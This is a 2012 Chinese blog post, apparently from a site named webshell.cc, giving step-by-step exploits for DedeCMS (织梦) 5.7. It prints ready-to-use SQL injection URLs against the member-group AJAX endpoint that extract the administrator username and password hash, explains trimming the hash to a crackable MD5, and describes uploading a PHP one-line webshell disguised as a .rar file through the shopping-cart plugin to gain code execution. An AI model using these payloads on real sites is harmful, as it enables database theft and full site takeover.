织梦5.7注入加上传漏洞

织梦5.7注入加上传漏洞
分类： 安全 ｜ 2012-05-5 ｜ 撸过12,571次
2人扯谈

会员中心查询会员信息语句过滤不严，导致url可提交注入参数；

会员中心有上传动作过滤不严，导致上传漏洞

详细说明：

①注入漏洞。

这站 http://www.webshell.cc/

首先访问“/data/admin/ver.txt”页面获取系统最后升级时间，

然后访问
“/member/ajax_membergroup.php?action=post&membergroup=1”
页面，如图说明存在该漏洞。

然后写上语句

查看管理员帐号

http://www.webshell.cc//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'`
 

admin www.2cto.com

 

查看管理员密码

http://www.webshell.cc//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@
 

8d29b1ef9f8c5a5af429

 

查看管理员密码

 

得到的是19位的，去掉前三位和最后一位，得到管理员的16位MD5

 

8d2

9b1ef9f8c5a5af42

9

 

cmd5没解出来 只好测试第二个方法

 

 

②上传漏洞：

 

只要登陆会员中心，然后访问页面链接

“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
 

如图，说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”

于是将Php一句话木马扩展名改为“rar”等，利用提交页面upload1.htm

http://www.webshell.cc/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post"
enctype="multipart/form-data" name="form1">
file:

newname:
提交

本站内容均为原创，转载请务必保留署名与链接！
织梦5.7注入加上传漏洞:http://www.webshell.cc/3520.html